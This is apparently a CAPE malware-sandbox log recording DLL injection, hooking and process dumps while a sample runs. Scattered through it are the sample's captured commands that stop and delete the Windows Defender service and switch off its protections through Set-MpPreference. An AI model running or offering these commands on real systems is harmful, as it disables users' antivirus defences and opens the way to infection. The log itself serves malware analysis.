2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF73F000 - 0x000007FEFF430000
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Allocated 0x1dc bytes for new import table at 0x00000000FF740000.
2019-08-13 23:41:17,928 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,928 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,944 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,944 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2244
2019-08-13 23:41:17,944 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2208
2019-08-13 23:41:17,944 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:17,944 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,944 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,944 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,944 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,944 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1788
2019-08-13 23:41:17,944 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,944 [root] DEBUG: Loader: Injecting process 2952 (thread 2932) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,944 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:17,944 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,944 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,944 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,944 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:17,944 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,944 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,944 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1628
2019-08-13 23:41:17,944 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,960 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,976 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,976 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,976 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,976 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:17,976 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,976 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,976 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:17,976 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,976 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,992 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,992 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,992 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1560
2019-08-13 23:41:17,992 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,992 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,992 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,992 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,992 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,992 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2952
2019-08-13 23:41:17,992 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,992 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,992 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,992 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2244 at 0x0000000074460000, image base 0x00000000FF730000, stack from 0x0000000000275000-0x0000000000280000
2019-08-13 23:41:17,992 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,992 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,992 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,992 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\sc  delete WinDefend.
2019-08-13 23:41:17,992 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,992 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,006 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2208 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000104000-0x0000000000200000
2019-08-13 23:41:18,006 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,006 [root] INFO: Added new process to list with pid: 2244
2019-08-13 23:41:18,006 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,006 [root] DEBUG: Loader: Injecting process 1560 (thread 2772) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,006 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableBlockAtFirstSeen $true.
2019-08-13 23:41:18,006 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1788 at 0x0000000074460000, image base 0x00000000FF730000, stack from 0x0000000000215000-0x0000000000220000
2019-08-13 23:41:18,006 [root] INFO: Monitor successfully loaded in process with pid 2244.
2019-08-13 23:41:18,006 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:18,006 [root] INFO: Added new process to list with pid: 2208
2019-08-13 23:41:18,006 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,006 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,006 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\sc  stop WinDefend.
2019-08-13 23:41:18,006 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,006 [root] INFO: Monitor successfully loaded in process with pid 2208.
2019-08-13 23:41:18,023 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,023 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,023 [root] INFO: Added new process to list with pid: 1788
2019-08-13 23:41:18,023 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:18,023 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,023 [root] INFO: Monitor successfully loaded in process with pid 1788.
2019-08-13 23:41:18,023 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,023 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-08-13 23:41:18,023 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:18,023 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:18,023 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,023 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-08-13 23:41:18,023 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,023 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,023 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2244
2019-08-13 23:41:18,038 [root] INFO: Announced 64-bit process name: powershell.exe pid: 624
2019-08-13 23:41:18,038 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1628 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x0000000000295000-0x00000000002A0000
2019-08-13 23:41:18,038 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2952 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x00000000001E6000-0x00000000001F0000
2019-08-13 23:41:18,038 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,038 [root] DEBUG: GetHookCallerBase: thread 2328 (handle 0x0), return address 0x00000000FF73107F, allocation base 0x00000000FF730000.
2019-08-13 23:41:18,038 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1788
2019-08-13 23:41:18,038 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisableRealtimeMonitoring $true.
2019-08-13 23:41:18,038 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisableBehaviorMonitoring $true.
2019-08-13 23:41:18,038 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,038 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1560
2019-08-13 23:41:18,038 [root] DEBUG: GetHookCallerBase: thread 1648 (handle 0x0), return address 0x00000000FF73107F, allocation base 0x00000000FF730000.
2019-08-13 23:41:18,038 [root] INFO: Added new process to list with pid: 1628
2019-08-13 23:41:18,038 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF730000.
2019-08-13 23:41:18,038 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,038 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:18,038 [root] INFO: Monitor successfully loaded in process with pid 1628.
2019-08-13 23:41:18,038 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF730000.
2019-08-13 23:41:18,038 [root] INFO: Added new process to list with pid: 2952
2019-08-13 23:41:18,038 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF730000.
2019-08-13 23:41:18,038 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:18,038 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,053 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF730000.
2019-08-13 23:41:18,053 [root] INFO: Monitor successfully loaded in process with pid 2952.
2019-08-13 23:41:18,053 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,053 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001DD4.
2019-08-13 23:41:18,053 [root] DEBUG: Loader: Injecting process 624 (thread 880) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,053 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:18,053 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001DD4.
2019-08-13 23:41:18,053 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,053 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:18,053 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:18,053 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\cryptbase (0xf000 bytes).
2019-08-13 23:41:18,053 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\cryptbase (0xf000 bytes).
2019-08-13 23:41:18,053 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,053 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,053 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:18,053 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:18,069 [root] WARNING: Process dump at path "C:\bbTJiLOfj\CAPE\2244_829227412381214382019" does not exist, skip.
2019-08-13 23:41:18,069 [root] INFO: Announced 64-bit process name: cmd.exe pid: 3020
2019-08-13 23:41:18,069 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:18,069 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,069 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xb000.
2019-08-13 23:41:18,069 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,069 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,069 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,069 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,069 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,069 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1788_1448334586381214382019
2019-08-13 23:41:18,069 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 624
2019-08-13 23:41:18,069 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,069 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xb000.
2019-08-13 23:41:18,085 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,085 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1560 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000144000-0x0000000000240000
2019-08-13 23:41:18,085 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,085 [root] DEBUG: Loader: Injecting process 3020 (thread 2924) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,085 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableIOAVProtection $true.
2019-08-13 23:41:18,085 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,085 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:18,085 [root] INFO: Added new process to list with pid: 1560
2019-08-13 23:41:18,085 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,085 [root] INFO: Monitor successfully loaded in process with pid 1560.
2019-08-13 23:41:18,085 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,085 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:18,085 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:18,085 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:18,085 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,085 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,101 [root] INFO: Announced 64-bit process name: powershell.exe pid: 2056
2019-08-13 23:41:18,101 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,101 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,101 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3020
2019-08-13 23:41:18,101 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,101 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,101 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:18,101 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,101 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 624 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x00000000000D5000-0x00000000000E0000
2019-08-13 23:41:18,101 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:18,101 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:18,101 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisableBlockAtFirstSeen $true.
2019-08-13 23:41:18,101 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:18,101 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,101 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,101 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:18,101 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:18,101 [root] INFO: Added new process to list with pid: 624
2019-08-13 23:41:18,101 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:18,115 [root] DEBUG: Loader: Injecting process 2056 (thread 1220) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,115 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,115 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:18,115 [root] INFO: Monitor successfully loaded in process with pid 624.
2019-08-13 23:41:18,115 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:18,115 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:18,115 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,115 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,115 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:18,131 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:18,131 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,131 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:18,131 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:18,131 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1356
2019-08-13 23:41:18,131 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:18,131 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:18,131 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,131 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,131 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,131 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,131 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,131 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,131 [root] INFO: Notified of termination of process with pid 1788.
2019-08-13 23:41:18,131 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3020 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x00000000001F4000-0x00000000002F0000
2019-08-13 23:41:18,131 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2056
2019-08-13 23:41:18,131 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,131 [root] INFO: Notified of termination of process with pid 2244.
2019-08-13 23:41:18,148 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisablePrivacyMode $true.
2019-08-13 23:41:18,148 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1092
2019-08-13 23:41:18,148 [root] DEBUG: Loader: Injecting process 1356 (thread 1996) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,148 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:18,148 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:18,148 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:18,148 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2872
2019-08-13 23:41:18,148 [root] INFO: Added new process to list with pid: 3020
2019-08-13 23:41:18,148 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,148 [root] DEBUG: GetHookCallerBase: thread 1276 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:18,148 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:18,148 [root] DEBUG: GetHookCallerBase: thread 2840 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:18,148 [root] INFO: Monitor successfully loaded in process with pid 3020.
2019-08-13 23:41:18,148 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,148 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:18,148 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,163 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:18,163 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:18,163 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:18,163 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:18,163 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:18,163 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:18,163 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:18,163 [root] INFO: Announced 64-bit process name: powershell.exe pid: 3004
2019-08-13 23:41:18,163 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:18,163 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:18,163 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:18,163 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:18,163 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:18,163 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:18,178 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:18,178 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:18,178 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:18,178 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:18,178 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:18,178 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:18,178 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:18,178 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-08-13 23:41:18,178 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:18,178 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,178 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:18,178 [root] DEBUG: Error 2 (0x2) - savePeFileToDisk: There was a problem renaming the file: The system cannot find the file specified.
2019-08-13 23:41:18,178 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:18,194 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:18,194 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1356
2019-08-13 23:41:18,194 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:18,194 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2056 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x00000000001A5000-0x00000000001B0000
2019-08-13 23:41:18,194 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:18,194 [root] DEBUG: Error 2 (0x2) - savePeFileToDisk: There was a problem deleting the file: C:\Users\user\AppData\Local\Temp\CapeOutput.bin: The system cannot find the file specified.
2019-08-13 23:41:18,194 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\1092_1207558384181214382019
2019-08-13 23:41:18,194 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:18,194 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisableIOAVProtection $true.
2019-08-13 23:41:18,194 [root] DEBUG: Loader: Injecting process 3004 (thread 1928) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,194 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:18,194 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x54400.
2019-08-13 23:41:18,194 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:18,194 [root] INFO: Added new process to list with pid: 2056
2019-08-13 23:41:18,194 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:18,194 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:18,210 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:18,210 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:18,210 [root] INFO: Monitor successfully loaded in process with pid 2056.
2019-08-13 23:41:18,210 [root] INFO: Notified of termination of process with pid 2872.
2019-08-13 23:41:18,210 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:18,210 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:18,210 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:18,226 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:18,226 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:18,226 [root] INFO: Notified of termination of process with pid 1092.
